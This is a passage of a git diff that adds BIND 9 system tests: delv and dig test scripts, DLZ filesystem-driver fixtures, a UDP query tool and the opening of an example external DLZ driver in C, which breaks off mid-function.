ret=0 + # following should fail because @IPv4 overrides earlier @IPv6 above + # and -6 forces IPv6 so this should fail, with a message + # "Use of IPv4 disabled by -6" + delv_with_opts @fd92:7065:b8e:ffff::3 @10.53.0.3 -6 -t txt foo.example > delv.out.test$n 2>&1 && ret=1 + # it should have no results but error output + grep "testing" < delv.out.test$n > /dev/null && ret=1 + grep "Use of IPv4 disabled by -6" delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "IPv6 unavailable; skipping" + fi + + n=$((n+1)) + echo_i "checking delv with IPv4 on IPv6 does not work ($n)" + if testsock6 fd92:7065:b8e:ffff::3 2>/dev/null + then + ret=0 + # following should fail because @IPv6 overrides earlier @IPv4 above + # and -4 forces IPv4 so this should fail, with a message + # "Use of IPv6 disabled by -4" + delv_with_opts @10.53.0.3 @fd92:7065:b8e:ffff::3 -4 -t txt foo.example > delv.out.test$n 2>&1 && ret=1 + # it should have no results but error output + grep "testing" delv.out.test$n > /dev/null && ret=1 + grep "Use of IPv6 disabled by -4" delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + else + echo_i "IPv6 unavailable; skipping" + fi + + n=$((n+1)) + echo_i "checking delv with reverse lookup works ($n)" + ret=0 + delv_with_opts @10.53.0.3 -x 127.0.0.1 > delv.out.test$n 2>&1 || ret=1 + # doesn't matter if has answer + grep -i "127\\.in-addr\\.arpa\\." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n '\\-ANY' 10800 3 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv over TCP works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 a a.example > delv.out.test$n || ret=1 + grep "10\\.0\\.0\\.1$" < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +multi +norrcomments works for DNSKEY (when default is rrcomments)($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +multi +norrcomments DNSKEY example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null && ret=1 + check_ttl_range delv.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +multi +norrcomments works for SOA (when default is rrcomments)($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +multi +norrcomments SOA example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null && ret=1 + check_ttl_range delv.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +rrcomments works for DNSKEY($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +rrcomments DNSKEY example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +rrcomments works for DNSKEY ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +rrcomments works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > delv.out.test$n || ret=1 + grep -q "$KEYDATA ; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +nosplit works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +nosplit DNSKEY example > delv.out.test$n || ret=1 + grep -q "$NOSPLIT" < delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + test "$(awk '{print NF}' < delv.out.test$n)" -eq 14 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +nosplit +norrcomments works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +nosplit +norrcomments DNSKEY example > delv.out.test$n || ret=1 + grep -q "$NOSPLIT\$" < delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + test "$(awk '{print NF}' < delv.out.test$n)" -eq 4 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +sp works as an abbriviated form of split ($n)" + ret=0 + delv_with_opts @10.53.0.3 +sp=4 -t sshfp foo.example > delv.out.test$n || ret=1 + grep " 9ABC DEF6 7890 " < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "SSHFP" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +sh works as an abbriviated form of short ($n)" + ret=0 + delv_with_opts @10.53.0.3 +sh a a.example > delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv -c IN works ($n)" + ret=0 + delv_with_opts @10.53.0.3 -c IN -t a a.example > delv.out.test$n || ret=1 + grep "a.example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv -c CH is ignored, and treated like IN ($n)" + ret=0 + delv_with_opts @10.53.0.3 -c CH -t a a.example > delv.out.test$n || ret=1 + grep "a.example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv H is ignored, and treated like IN ($n)" + ret=0 + delv_with_opts @10.53.0.3 -c CH -t a a.example > delv.out.test$n || ret=1 + grep "a.example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv -q -m works ($n)" + ret=0 + delv_with_opts @10.53.0.3 -q -m > delv.out.test$n 2>&1 || ret=1 + grep '^; -m\..*[0-9]*.*IN.*ANY.*;' delv.out.test$n > /dev/null || ret=1 + grep "^add " delv.out.test$n > /dev/null && ret=1 + grep "^del " delv.out.test$n > /dev/null && ret=1 + check_ttl_range delv.out.test$n '\\-ANY' 300 3 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv -t ANY works ($n)" + ret=0 + delv_with_opts @10.53.0.3 -t ANY example > delv.out.test$n 2>&1 || ret=1 + grep "^example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n NS 300 || ret=1 + check_ttl_range delv.out.test$n SOA 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv loads key-style trust anchors ($n)" + ret=0 + delv_with_opts -a ns3/anchor.dnskey +root=example @10.53.0.3 -t DNSKEY example > delv.out.test$n 2>&1 || ret=1 + grep "fully validated" delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv loads DS-style trust anchors ($n)" + ret=0 + delv_with_opts -a ns3/anchor.ds +root=example @10.53.0.3 -t DNSKEY example > delv.out.test$n 2>&1 || ret=1 + grep "fully validated" delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + if [ $HAS_PYYAML -ne 0 ] ; then + n=$((n+1)) + echo_i "check delv +yaml output ($n)" + ret=0 + delv_with_opts +yaml @10.53.0.3 any ns2.example > delv.out.test$n || ret=1 + value=$($PYTHON yamlget.py delv.out.test$n status || ret=1) + [ "$value" = "success" ] || ret=1 + value=$($PYTHON yamlget.py delv.out.test$n query_name || ret=1) + [ "$value" = "ns2.example" ] || ret=1 + value=$($PYTHON yamlget.py delv.out.test$n records 0 answer_not_validated 0 || ret=1) + count=$(echo $value | wc -w ) + [ ${count:-0} -eq 5 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + fi +else + echo_i "$DELV is needed, so skipping these delv tests" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/digdelv/yamlget.py b/bin/tests/system/digdelv/yamlget.py new file mode 100644 index 0000000..afa582d --- /dev/null +++ b/bin/tests/system/digdelv/yamlget.py @@ -0,0 +1,35 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import sys + +try: + import yaml +# pylint: disable=bare-except +except: + print("No python yaml module, skipping") + sys.exit(1) + +with open(sys.argv[1], "r", encoding="utf-8") as f: + for item in yaml.safe_load_all(f): + for key in sys.argv[2:]: + try: + key = int(key) + except ValueError: + pass + + try: + item = item[key] + except KeyError: + print('Key "' + key + '" not found.') + sys.exit(1) + + print(item) diff --git a/bin/tests/system/ditch.pl b/bin/tests/system/ditch.pl new file mode 100644 index 0000000..e208250 --- /dev/null +++ b/bin/tests/system/ditch.pl @@ -0,0 +1,87 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a tool for sending queries via UDP to specified address and +# port, then exiting without waiting for a response. +# +# Usage: ditch.pl [-s <address>] [-p <port>] [filename] +# +# Input (in filename, if specified, otherwise stdin) is a series of one +# or more DNS names and types to send as queries, e.g.: +# +# www.example.com A +# www.example.org MX +# +# If not specified, address defaults to 127.0.0.1, port to 53. + +require 5.006.001; + +use strict; +use Getopt::Std; +use Net::DNS; +use Net::DNS::Packet; +use IO::File; +use IO::Socket; + +sub usage { + print ("Usage: ditch.pl [-s address] [-p port] [file]\n"); + exit 1; +} + +my %options={}; +getopts("s:p:t:", \%options); + +my $addr = "127.0.0.1"; +$addr = $options{s} if defined $options{s}; + +my $port = 53; +$port = $options{p} if defined $options{p}; + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + next if ($line =~ m/^ *#/); + my @tokens = split (' ', $line); + + my $packet; + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(); + $err and die $err; + } + + my $q = new Net::DNS::Question($tokens[0], $tokens[1], "IN"); + $packet->header->rd(1); + $packet->push(question => $q); + + my $sock = IO::Socket::INET->new(PeerAddr => $addr, PeerPort => $port, + Proto => "udp",) or die "$!"; + + my $bytes = $sock->send($packet->data); + #print ("sent $bytes bytes to $addr:$port:\n"); + #print (" ", unpack("H* ", $packet->data), "\n"); + + $sock->close; +} + +close $file; diff --git a/bin/tests/system/dlz/clean.sh b/bin/tests/system/dlz/clean.sh new file mode 100644 index 0000000..65c836a --- /dev/null +++ b/bin/tests/system/dlz/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.conf +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/DNAME=10=example.net.= b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/DNAME=10=example.net.= new file mode 100644 index 0000000..50d2ad0 --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/DNAME=10=example.net.= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "DNAME 10 example.net.". diff --git a/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/NS=10=example.com.= b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/NS=10=example.com.= new file mode 100644 index 0000000..5faa45c --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/NS=10=example.com.= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "NS 10 example.com.". diff --git a/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/SOA=10=ns.example.com.=root.example.com.=None=None=None=None=None= b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/SOA=10=ns.example.com.=root.example.com.=None=None=None=None=None= new file mode 100644 index 0000000..ee74e03 --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/SOA=10=ns.example.com.=root.example.com.=None=None=None=None=None= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "SOA 10 ns.example.com. root.example.com. 2010062900 None None None None" which is a malformed SOA record. diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/DNAME=10=example.net.= b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/DNAME=10=example.net.= new file mode 100644 index 0000000..50d2ad0 --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/DNAME=10=example.net.= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "DNAME 10 example.net.". diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/NS=10=example.com.= b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/NS=10=example.com.= new file mode 100644 index 0000000..5faa45c --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/NS=10=example.com.= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "NS 10 example.com.". diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/SOA=10=ns.example.com.=root.example.com.=2010062900=0=0=0=10= b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/SOA=10=ns.example.com.=root.example.com.=2010062900=0=0=0=10= new file mode 100644 index 0000000..2f63999 --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/SOA=10=ns.example.com.=root.example.com.=2010062900=0=0=0=10= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "SOA 10 ns.example.com. root.example.com. 2010062900 0 0 0 10". diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/xfr.d/10.53.0.1 b/bin/tests/system/dlz/ns1/dns-root/com/example/xfr.d/10.53.0.1 new file mode 100644 index 0000000..8a07d4f --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/example/xfr.d/10.53.0.1 @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file are not read by the filesystem driver. +The presence of this file allows 10.53.0.1 to transfer this zone. diff --git a/bin/tests/system/dlz/ns1/named.conf.in b/bin/tests/system/dlz/ns1/named.conf.in new file mode 100644 index 0000000..478672d --- /dev/null +++ b/bin/tests/system/dlz/ns1/named.conf.in @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +dlz fszone { + database "filesystem dns-root/ dns.d xfr.d 0 ="; +}; diff --git a/bin/tests/system/dlz/prereq.sh b/bin/tests/system/dlz/prereq.sh new file mode 100644 index 0000000..4cf83f5 --- /dev/null +++ b/bin/tests/system/dlz/prereq.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if ! $FEATURETEST --with-dlz-filesystem; then + echo_i "DLZ filesystem driver not supported" + exit 255 +fi +exit 0 diff --git a/bin/tests/system/dlz/setup.sh b/bin/tests/system/dlz/setup.sh new file mode 100644 index 0000000..1dc06c2 --- /dev/null +++ b/bin/tests/system/dlz/setup.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/dlz/tests.sh b/bin/tests/system/dlz/tests.sh new file mode 100644 index 0000000..87b3aa6 --- /dev/null +++ b/bin/tests/system/dlz/tests.sh @@ -0,0 +1,77 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +# Check the example.com. domain + +echo_i "checking DNAME at apex works ($n)" +ret=0 +$DIG $DIGOPTS +norec foo.example.com. \ + @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*DNAME.*example.net." dig.out.ns1.test$n > /dev/null || ret=1 +grep "foo.example.com..*CNAME.*foo.example.net." dig.out.ns1.test$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ IXFR=2010062899 (less than serial) ($n)" +ret=0 +$DIG $DIGOPTS ixfr=2010062899 example.com @10.53.0.1 +all > dig.out.ns1.test$n +grep "example.com..*IN.IXFR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.DNAME.example.net." dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.NS.example.com." dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ IXFR=2010062900 (equal serial) ($n)" +ret=0 +$DIG $DIGOPTS ixfr=2010062900 example.com @10.53.0.1 +all > dig.out.ns1.test$n +grep "example.com..*IN.IXFR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.DNAME.example.net." dig.out.ns1.test$n > /dev/null && ret=1 +grep "example.com..*10.IN.NS.example.com." dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ IXFR=2010062901 (greater than serial) ($n)" +ret=0 +$DIG $DIGOPTS ixfr=2010062901 example.com @10.53.0.1 +all > dig.out.ns1.test$n +grep "example.com..*IN.IXFR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.DNAME.example.net." dig.out.ns1.test$n > /dev/null && ret=1 +grep "example.com..*10.IN.NS.example.com." dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ with a malformed SOA record" +ret=0 +$DIG $DIGOPTS broken.com type600 @10.53.0.1 > dig.out.ns1.test$n +grep status: dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dlzexternal/Makefile.in b/bin/tests/system/dlzexternal/Makefile.in new file mode 100644 index 0000000..cfdda3e --- /dev/null +++ b/bin/tests/system/dlzexternal/Makefile.in @@ -0,0 +1,49 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \ + ${OPENSSL_CFLAGS} +CDEFINES = +CWARNINGS = + +LIBS = @LIBS@ + +SO_TARGETS = driver.@SO@ +TARGETS = @SO_TARGETS@ + +SRCS = driver.c + +SO_OBJS = driver.@O@ +SO_SRCS = driver.c + +OBJS = + +@BIND9_MAKE_RULES@ + +CFLAGS = @CFLAGS@ @SO_CFLAGS@ +SO_LDFLAGS = @LDFLAGS@ @SO_LDFLAGS@ + +driver.@SO@: ${SO_OBJS} + ${LIBTOOL_MODE_LINK} @SO_LD@ ${SO_LDFLAGS} -o $@ driver.@O@ + +clean distclean:: + rm -f ${TARGETS} + +distclean:: + rm -f ns1/named.conf diff --git a/bin/tests/system/dlzexternal/clean.sh b/bin/tests/system/dlzexternal/clean.sh new file mode 100644 index 0000000..2bbf75b --- /dev/null +++ b/bin/tests/system/dlzexternal/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after dlzexternal tests. +# + +rm -f ns1/update.txt +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns1/ddns.key +rm -f dig.out* +rm -f ns*/named.lock +rm -f ns1/session.key +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dlzexternal/driver.c b/bin/tests/system/dlzexternal/driver.c new file mode 100644 index 0000000..14f02bc --- /dev/null +++ b/bin/tests/system/dlzexternal/driver.c @@ -0,0 +1,845 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * This provides a very simple example of an external loadable DLZ + * driver, with update support. + */ + +#include "driver.h" +#include <inttypes.h> +#include <stdarg.h> +#include <stdbool.h> +#include <stdio.h> +#include <stdlib.h> + +#include <isc/log.h> +#include <isc/result.h> +#include <isc/string.h> +#include <isc/types.h> +#include <isc/util.h> + +#include <dns/dlz_dlopen.h> +#include <dns/types.h> + +#define CHECK(x) \ + do { \ + result = (x); \ + if (result != ISC_R_SUCCESS) \ + goto failure; \ + } while (0) + +#define loginfo(...) \ + ({ \ + if ((state != NULL) && (state->log != NULL)) \ + state->log(ISC_LOG_INFO, __VA_ARGS__); \ + }) +#define logerr(...) \ + ({ \ + if ((state != NULL) && (state->log != NULL)) \ + state->log(ISC_LOG_ERROR, __VA_ARGS__); \ + }) + +/* For this simple example, use fixed sized strings */ +struct record { + char name[100]; + char type[10]; + char data[200]; + dns_ttl_t ttl; +}; + +#define MAX_RECORDS 100 + +typedef void +log_t(int level, const char *fmt, ...); + +struct dlz_example_data { + char *zone_name; + + /* An example driver doesn't need good memory management :-) */ + struct record current[MAX_RECORDS]; + struct record adds[MAX_RECORDS]; + struct record deletes[MAX_RECORDS]; + + bool transaction_started; + + /* Helper functions from the dlz_dlopen driver */ + log_t *log; + dns_sdlz_putrr_t *putrr; + dns_sdlz_putnamedrr_t *putnamedrr; + dns_dlz_writeablezone_t *writeable_zone; +}; + +static bool +single_valued(const char *type) { + const char *single[] = { "soa", "cname", NULL }; + int i; + + for (i = 0; single[i]; i++) { + if (strcasecmp(single[i], type) == 0) { + return (true); + } + } + return (false); +} + +/* + * Add a record to a list + */ +static isc_result_t +add_name(struct dlz_example_data *state, struct record *list, const char *name, + const char *type, dns_ttl_t ttl, const char *data) { + int i; + bool single = single_valued(type); + int first_empty = -1; + + for (i = 0; i < MAX_RECORDS; i++) { + INSIST(list[i].name != NULL); + if (first_empty == -1 && strlen(list[i].name) == 0U) { + first_empty = i; + } + if (strcasecmp(list[i].name, name) != 0) { + continue; + } + if (strcasecmp(list[i].type, type) != 0) { + continue; + } + if (!single && strcasecmp(list[i].data, data) != 0) { + continue; + } + break; + } + if (i == MAX_RECORDS && first_empty != -1) { + i = first_empty; + } + if (i == MAX_RECORDS) { + logerr("dlz_example: out of record space"); + return (ISC_R_FAILURE); + } + + if (strlen(name) >= sizeof(list[i].name) || + strlen(type) >= sizeof(list[i].type) || + strlen(data) >= sizeof(list[i].data)) + { + return (ISC_R_NOSPACE); + } + + strncpy(list[i].name, name, sizeof(list[i].name) - 1); + list[i].name[sizeof(list[i].name) - 1] = '\0'; + + strncpy(list[i].type, type, sizeof(list[i].type) - 1); + list[i].type[sizeof(list[i].type) - 1] = '\0'; + + strncpy(list[i].data, data, sizeof(list[i].data) - 1); + list[i].data[sizeof(list[i].data) - 1] = '\0'; + + list[i].ttl = ttl; + + return (ISC_R_SUCCESS); +} + +/* + * Delete a record from a list + */ +static isc_result_t +del_name(struct dlz_example_data *state, struct record *list, const char *name, + const char *type, dns_ttl_t ttl, const char *data) { + int i; + + UNUSED(state); + + for (i = 0; i < MAX_RECORDS; i++) { + if (strcasecmp(name, list[i].name) == 0 && + strcasecmp(type, list[i].type) == 0 && + strcasecmp(data, list[i].data) == 0 && ttl == list[i].ttl) + { + break; + } + } + if (i == MAX_RECORDS) { + return (ISC_R_NOTFOUND); + } + memset(&list[i], 0, sizeof(struct record)); + return (ISC_R_SUCCESS); +} + +static isc_result_t +fmt_address(isc_sockaddr_t *addr, char *buffer, size_t size) { + char addr_buf[INET6_ADDRSTRLEN]; + const char *ret; 